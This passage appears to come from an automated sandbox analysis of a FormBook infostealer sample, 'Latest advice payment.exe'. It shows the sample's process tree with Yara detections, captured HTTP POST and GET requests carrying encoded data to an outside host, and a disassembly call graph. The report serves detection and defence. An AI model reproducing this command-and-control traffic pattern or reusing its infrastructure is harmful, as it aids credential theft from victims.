                                                          Data Ascii: b6=r+fOQXLoIUMlXNloG2JAMOAbf+EpjDbIJtlpyJcV0OFFd4EL1R6AnJuaqyxvT0vn7PxBM76R0ctq+Rc98XVwrGLX6nrn5FHv2fCIMKryvIJW9KOYyCl4J/Bagfz4ESxlyjDYED6wnfEVRjVBYaoPy35Uk2NfAZpB3SLE1TVpyeC+5S/yigZkktqt9xxiVHmaY2fpQhvGFcV5
                                                          Dec 3, 2024 23:29:42.352122068 CET533INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:42 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.650040209.74.77.10780768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:43.703735113 CET790OUTPOST /alu5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.learnwithus.site
                                                          Origin: http://www.learnwithus.site
                                                          Referer: http://www.learnwithus.site/alu5/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 39 46 64 64 67 4c 30 51 36 41 6b 4a 75 61 68 53 77 45 4e 45 76 53 37 50 74 2f 4d 2b 61 52 30 63 35 71 2b 56 51 39 38 41 42 7a 6f 32 4c 56 32 48 72 70 6d 31 48 76 32 66 43 49 4d 4b 58 4d 76 4d 64 57 39 61 2b 59 79 6a 6c 37 41 66 42 5a 71 2f 7a 34 41 53 77 73 79 6a 43 50 45 42 43 4b 6e 63 73 56 52 6d 35 42 59 49 4d 4d 6f 6e 35 6f 67 32 4e 4a 4d 38 55 59 37 42 47 30 72 52 35 32 6d 73 43 49 31 45 69 6f 2b 54 5a 48 32 39 4b 76 39 7a 70 51 56 6e 6d 77 61 32 6e 70 43 32 6a 68 4b 6f 77 61 72 66 6b 37 57 58 57 4c 56 75 32 2b 69 46 64 77 70 37 6b 4d 42 77 3d 3d
                                                          Data Ascii: b6=r+fOQXLoIUMlWsVoEVxAOuAcVeEppjbEJtppyIIF049FddgL0Q6AkJuahSwENEvS7Pt/M+aR0c5q+VQ98ABzo2LV2Hrpm1Hv2fCIMKXMvMdW9a+Yyjl7AfBZq/z4ASwsyjCPEBCKncsVRm5BYIMMon5og2NJM8UY7BG0rR52msCI1Eio+TZH29Kv9zpQVnmwa2npC2jhKowarfk7WXWLVu2+iFdwp7kMBw==
                                                          Dec 3, 2024 23:29:45.015003920 CET533INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:44 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.650041209.74.77.10780768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:46.521192074 CET1803OUTPOST /alu5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.learnwithus.site
                                                          Origin: http://www.learnwithus.site
                                                          Referer: http://www.learnwithus.site/alu5/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 31 46 65 75 59 4c 31 79 53 41 6c 4a 75 61 69 53 77 48 4e 45 76 31 37 50 31 6a 4d 2b 57 72 30 66 42 71 78 57 59 39 6f 6c 39 7a 2f 47 4c 56 73 6e 72 6f 35 46 47 33 32 66 53 4d 4d 4b 6e 4d 76 4d 64 57 39 59 6d 59 77 79 6c 37 47 66 42 61 67 66 79 73 45 53 78 4a 79 6a 72 36 45 42 47 67 6b 74 4d 56 52 47 70 42 65 37 6f 4d 6a 6e 35 51 73 57 4d 4b 4d 38 51 39 37 42 62 46 72 55 74 4d 6d 73 47 49 33 31 4c 67 74 58 4a 4d 72 64 62 4c 68 6b 52 63 54 33 32 33 65 6d 76 6d 44 48 66 51 48 35 4a 74 6b 4a 30 74 43 46 6a 4b 64 4e 4f 72 75 56 49 2b 71 36 35 75 55 43 76 52 56 76 7a 55 77 43 2f 75 7a 67 61 6e 67 45 32 6e 76 7a 51 78 37 79 55 7a 75 6b 41 2f 2f 72 6a 58 73 37 4d 51 31 56 6a 70 67 2b 36 62 51 48 43 41 2f 4f 78 69 58 4a 36 67 72 35 5a 54 54 56 4a 55 49 70 67 70 7a 52 76 31 45 54 30 44 71 67 76 67 52 75 67 6b 78 75 68 47 53 2f 74 56 75 61 6b 65 50 53 6f 31 4f 66 45 33 4f 6b 66 [TRUNCATED]
                                                          Data Ascii: b6=r+fOQXLoIUMlWsVoEVxAOuAcVeEppjbEJtppyIIF041FeuYL1ySAlJuaiSwHNEv17P1jM+Wr0fBqxWY9ol9z/GLVsnro5FG32fSMMKnMvMdW9YmYwyl7GfBagfysESxJyjr6EBGgktMVRGpBe7oMjn5QsWMKM8Q97BbFrUtMmsGI31LgtXJMrdbLhkRcT323emvmDHfQH5JtkJ0tCFjKdNOruVI+q65uUCvRVvzUwC/uzgangE2nvzQx7yUzukA//rjXs7MQ1Vjpg+6bQHCA/OxiXJ6gr5ZTTVJUIpgpzRv1ET0DqgvgRugkxuhGS/tVuakePSo1OfE3Okfgq3+7ygG20DhrfliefFHFKOGygsj4A4156vzRe69yF0gXra9ULWaebuy8q7rKd7sqXrmt7IjKG5Gu6h+TmBmV3pdcQnVF/+49rJGOtU3msVfi6pY36qeQ1BpYiVvUws3VG4756SqLZSPyev0E8jzwC6T08LU5FSFQUOLASQKd4hBc/K9w2dEYMFFLtPItp2lCO4Dclp82/kPpw2uZrrt5iZ7RBp2q8KKcmZpvIy/y9mnprYCXPu4WfPnrUVWLheDPzykDDo8v95acMaEH01Hb8PyrwQYKIACgmhho/R5LxniFzvNvp8zu/Erv7jpqBdeafFuQIvHaN3w6XPssllml3kKATZV1wkLX9abMF9zwipRBe/XsmGRsqyUDhQL3h1w/Yni3RwLu0ld7zXJ+3pRDRCSVIJitS8UfiszCdSgribACtP8nXGL9LRg+xMvtzUmQ/Wg9XO0LshxCIOgttQJU+o5bpJMmYU5uYq1ZdZuxuTMyYOAGl7qg2Ov8GnAZ2Lubd9BA9+rcoLbY2rwKwOTcY4yqw95F4APPdKNOgouHUEeYcCQceZzUCaj7alGJvNsx8u7I4ONb2KS46Ttaxov7akBSmiaG/HwnU9RXrsSEvLKZYB7LmzvyJILeGzFbmLvpq5BKT4YN24Wy1yxy0SXqpRbmiqc2c0UUo [TRUNCATED]
                                                          Dec 3, 2024 23:29:47.916810036 CET533INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:47 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.650042209.74.77.10780768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:29:49.187618017 CET508OUTGET /alu5/?b6=m83uTjDkEXAXcvpaGmUoJ8Y4XcRIkh2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxo2CL5VTj7SrR/OegDMXRn69R6rST1isaHd8Em6LhDwUu8jHHb1w=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.learnwithus.site
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:29:50.450774908 CET548INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:50 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:17:26:51
                                                          Start date:03/12/2024
                                                          Path:C:\Users\user\Desktop\Latest advice payment.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Latest advice payment.exe"
                                                          Imagebase:0x560000
                                                          File size:1'216'000 bytes
                                                          MD5 hash:B1FF44D20BC312E62D55DAF8A8CF5B07
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:17:26:52
                                                          Start date:03/12/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Latest advice payment.exe"
                                                          Imagebase:0xcc0000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2433911205.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2435582129.0000000003300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2436623897.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:17:27:12
                                                          Start date:03/12/2024
                                                          Path:C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe"
                                                          Imagebase:0x650000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3991350388.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:8
                                                          Start time:17:27:15
                                                          Start date:03/12/2024
                                                          Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\bitsadmin.exe"
                                                          Imagebase:0xc20000
                                                          File size:186'880 bytes
                                                          MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3990417322.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3990055319.0000000000540000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3990341919.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:12
                                                          Start time:17:27:28
                                                          Start date:03/12/2024
                                                          Path:C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe"
                                                          Imagebase:0x650000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3993071436.0000000005760000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:14
                                                          Start time:17:27:41
                                                          Start date:03/12/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff728280000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:3.6%
                                                            Dynamic/Decrypted Code Coverage:1.5%
                                                            Signature Coverage:10.7%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:158
                                                            execution_graph 100683 561066 100688 56f76f 100683->100688 100685 56106c 100721 582d40 100685->100721 100689 56f790 100688->100689 100724 57ff03 100689->100724 100693 56f7d7 100734 567667 100693->100734 100696 567667 59 API calls 100697 56f7eb 100696->100697 100698 567667 59 API calls 100697->100698 100699 56f7f5 100698->100699 100700 567667 59 API calls 100699->100700 100701 56f833 100700->100701 100702 567667 59 API calls 100701->100702 100703 56f8fe 100702->100703 100739 575f87 100703->100739 100707 56f930 100708 567667 59 API calls 100707->100708 100709 56f93a 100708->100709 100767 57fd9e 100709->100767 100711 56f981 100712 56f991 GetStdHandle 100711->100712 100713 5a45ab 100712->100713 100714 56f9dd 100712->100714 100713->100714 100716 5a45b4 100713->100716 100715 56f9e5 OleInitialize 100714->100715 100715->100685 100774 5c6b38 64 API calls Mailbox 100716->100774 100718 5a45bb 100775 5c7207 CreateThread 100718->100775 100720 5a45c7 CloseHandle 100720->100715 100847 582c44 100721->100847 100723 561076 100776 57ffdc 100724->100776 100727 57ffdc 59 API calls 100728 57ff45 100727->100728 100729 567667 59 API calls 100728->100729 100730 57ff51 100729->100730 100783 567bcc 100730->100783 100732 56f796 100733 580162 6 API calls 100732->100733 100733->100693 100735 580db6 Mailbox 59 API calls 100734->100735 100736 567688 100735->100736 100737 580db6 Mailbox 59 API calls 100736->100737 100738 567696 100737->100738 100738->100696 100740 567667 59 API calls 100739->100740 100741 575f97 100740->100741 100742 567667 59 API calls 100741->100742 100743 575f9f 100742->100743 100842 575a9d 100743->100842 100746 575a9d 59 API calls 100747 575faf 100746->100747 100748 567667 59 API calls 100747->100748 100749 575fba 100748->100749 100750 580db6 Mailbox 59 API calls 100749->100750 100751 56f908 100750->100751 100752 5760f9 100751->100752 100753 576107 100752->100753 100754 567667 59 API calls 100753->100754 100755 576112 100754->100755 100756 567667 59 API calls 100755->100756 100757 57611d 100756->100757 100758 567667 59 API calls 100757->100758 100759 576128 100758->100759 100760 567667 59 API calls 100759->100760 100761 576133 100760->100761 100762 575a9d 59 API calls 100761->100762 100763 57613e 100762->100763 100764 580db6 Mailbox 59 API calls 100763->100764 100765 576145 RegisterWindowMessageW 100764->100765 100765->100707 100768 5b576f 100767->100768 100769 57fdae 100767->100769 100845 5c9ae7 60 API calls 100768->100845 100770 580db6 Mailbox 59 API calls 100769->100770 100772 57fdb6 100770->100772 100772->100711 100773 5b577a 100774->100718 100775->100720 100846 5c71ed 65 API calls 100775->100846 100777 567667 59 API calls 100776->100777 100778 57ffe7 100777->100778 100779 567667 59 API calls 100778->100779 100780 57ffef 100779->100780 100781 567667 59 API calls 100780->100781 100782 57ff3b 100781->100782 100782->100727 100784 567c45 100783->100784 100785 567bd8 __NMSG_WRITE 100783->100785 100796 567d2c 100784->100796 100787 567c13 100785->100787 100788 567bee 100785->100788 100793 568029 100787->100793 100792 567f27 59 API calls Mailbox 100788->100792 100791 567bf6 _memmove 100791->100732 100792->100791 100800 580db6 100793->100800 100795 568033 100795->100791 100797 567d3a 100796->100797 100799 567d43 _memmove 100796->100799 100797->100799 100838 567e4f 100797->100838 100799->100791 100803 580dbe 100800->100803 100802 580dd8 100802->100795 100803->100802 100805 580ddc std::exception::exception 100803->100805 100810 58571c 100803->100810 100827 5833a1 DecodePointer 100803->100827 100828 58859b RaiseException 100805->100828 100807 580e06 100829 5884d1 58 API calls _free 100807->100829 100809 580e18 100809->100795 100811 585797 100810->100811 100814 585728 100810->100814 100836 5833a1 DecodePointer 100811->100836 100813 58579d 100837 588b28 58 API calls __getptd_noexit 100813->100837 100817 58575b RtlAllocateHeap 100814->100817 100819 585733 100814->100819 100821 585783 100814->100821 100825 585781 100814->100825 100833 5833a1 DecodePointer 100814->100833 100817->100814 100818 58578f 100817->100818 100818->100803 100819->100814 100830 58a16b 58 API calls __NMSG_WRITE 100819->100830 100831 58a1c8 58 API calls 6 library calls 100819->100831 100832 58309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100819->100832 100834 588b28 58 API calls __getptd_noexit 100821->100834 100835 588b28 58 API calls __getptd_noexit 100825->100835 100827->100803 100828->100807 100829->100809 100830->100819 100831->100819 100833->100814 100834->100825 100835->100818 100836->100813 100837->100818 100839 567e62 100838->100839 100841 567e5f _memmove 100838->100841 100840 580db6 Mailbox 59 API calls 100839->100840 100840->100841 100841->100799 100843 567667 59 API calls 100842->100843 100844 575aa5 100843->100844 100844->100746 100845->100773 100848 582c50 _fprintf 100847->100848 100855 583217 100848->100855 100854 582c77 _fprintf 100854->100723 100872 589c0b 100855->100872 100857 582c59 100858 582c88 DecodePointer DecodePointer 100857->100858 100859 582cb5 100858->100859 100860 582c65 100858->100860 100859->100860 100918 5887a4 59 API calls __filbuf 100859->100918 100869 582c82 100860->100869 100862 582d18 EncodePointer EncodePointer 100862->100860 100863 582cec 100863->100860 100867 582d06 EncodePointer 100863->100867 100920 588864 61 API calls 2 library calls 100863->100920 100864 582cc7 100864->100862 100864->100863 100919 588864 61 API calls 2 library calls 100864->100919 100867->100862 100868 582d00 100868->100860 100868->100867 100921 583220 100869->100921 100873 589c1c 100872->100873 100874 589c2f EnterCriticalSection 100872->100874 100879 589c93 100873->100879 100874->100857 100876 589c22 100876->100874 100903 5830b5 58 API calls 3 library calls 100876->100903 100880 589c9f _fprintf 100879->100880 100881 589ca8 100880->100881 100882 589cc0 100880->100882 100904 58a16b 58 API calls __NMSG_WRITE 100881->100904 100894 589ce1 _fprintf 100882->100894 100907 58881d 58 API calls 2 library calls 100882->100907 100885 589cad 100905 58a1c8 58 API calls 6 library calls 100885->100905 100886 589cd5 100888 589ceb 100886->100888 100889 589cdc 100886->100889 100892 589c0b __lock 58 API calls 100888->100892 100908 588b28 58 API calls __getptd_noexit 100889->100908 100890 589cb4 100906 58309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100890->100906 100895 589cf2 100892->100895 100894->100876 100897 589cff 100895->100897 100898 589d17 100895->100898 100909 589e2b InitializeCriticalSectionAndSpinCount 100897->100909 100910 582d55 100898->100910 100901 589d0b 100916 589d33 LeaveCriticalSection _doexit 100901->100916 100904->100885 100905->100890 100907->100886 100908->100894 100909->100901 100911 582d87 __dosmaperr 100910->100911 100912 582d5e RtlFreeHeap 100910->100912 100911->100901 100912->100911 100913 582d73 100912->100913 100917 588b28 58 API calls __getptd_noexit 100913->100917 100915 582d79 GetLastError 100915->100911 100916->100894 100917->100915 100918->100864 100919->100863 100920->100868 100924 589d75 LeaveCriticalSection 100921->100924 100923 582c87 100923->100854 100924->100923 100925 561016 100930 564974 100925->100930 100928 582d40 __cinit 67 API calls 100929 561025 100928->100929 100931 580db6 Mailbox 59 API calls 100930->100931 100932 56497c 100931->100932 100933 56101b 100932->100933 100937 564936 100932->100937 100933->100928 100938 564951 